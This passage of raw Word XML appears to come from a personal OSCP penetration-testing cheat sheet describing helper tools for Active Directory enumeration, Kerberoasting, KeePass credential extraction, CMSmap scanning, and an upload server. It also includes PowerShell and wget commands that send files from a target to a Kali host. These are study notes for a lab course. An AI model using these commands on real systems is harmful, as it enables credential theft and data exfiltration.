          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Kerberoast</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, and checks </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Password Policy</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="378"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">saves list of domain users to a file called </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">users</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002D3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="378"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Puts the rest into terminal as output</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002D4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="378"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">After inspecting the enum-AD script, it seems like it doesn't work when the password includes a space, so keep that in mind!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002D5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="378"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Usage:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002D6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="378"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">enum-AD -i &lt;DC-IP&gt; -u &lt;domain user&gt; -p|-H &lt;password|hash&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002D7">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002D8">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002D9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="378"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">kdbx-crawl:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> parses through kdbx files and gives creds in nice format</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002DA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="378"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Usage: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">kdbx-crawl -f &lt;kdbx file&gt; -p|-H &lt;password|hash&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002DB">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002DC">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002DD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="378"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">upload-server:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> It's like python hosting server </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">BUT IT WORKS BOTH WAYS, meaning we can download from Kali, or upload files to Kali</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, meaning we don't need to set up </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">impacket-smbserver</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SCP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002DE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="881"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the output (after running the command), they teach you how to upload (use PUT instead of POST)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002DF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="881"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you see errors after running the command in powershell, ignore that and check your Kali to see if the upload to Kali worked, since it probably did</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002E0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="881"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Usage:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> upload-server &lt;port&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002E1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="881"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows PS:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002E2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="881"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Invoke-WebRequest -Uri http://192.168.45.232:80/&lt;outfile&gt; -Method </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PUT </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-InFile &lt;file_path&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002E3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="881"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Invoke-WebRequest -Uri http://192.168.45.232:80/&lt;outfile&gt; -Method POST -InFile &lt;file_path&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002E4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="881"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux wget:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002E5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="881"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wget --method=</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PUT</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> --body-file=&lt;file_path&gt; http://192.168.45.232:80/&lt;outfile&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002E6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="881"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wget --method=POST --body-file=&lt;file_path&gt; http://192.168.45.232:80/&lt;outfile&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002E7">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002E8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="378"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">reboot.c:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> a tool that supposedly helps reboot machine if it doesn't work with the shutdown command</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="378"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I saved the precompiled .exe in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">~/Downloads/OSCP-Scripts</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002EA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="378"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For 64-bit: use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">reboot.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002EB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="378"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For 32-bit: use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">reboot32.exe</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numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="378"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.\reboot.exe</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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="378"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">clock-sync</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="378"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is for the Kerberos time skew problem. You can alternatively use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo ntpdate [insert domain name here]</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002F2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="378"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sync time with Domain</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002F3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="378"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo clock-sync &lt;DC IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="378"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Reset time to normal </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002F5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="378"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo clock-sync</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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Style w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_dd2ff67gcn" w:id="10"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CMSmap</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hyperlink r:id="rId22">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/dionach/CMSmap</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">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CMSmap is a python open source CMS scanner that automates the process of detecting security flaws of the most popular CMSs </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color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python cmsmap.py http://$IP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000300">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 cmsmap.py http://$IP</w:t>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This was from Powall's cheatsheet</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5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_roiu7d2yh14l" w:id="11"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Apache</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This was used in the doas subssection in the /bin section for Relia </w:t>
      </w:r>
      <w:hyperlink r:id="rId23">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">172.16.xxx</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.20</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Apache logs:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000030A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1029"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
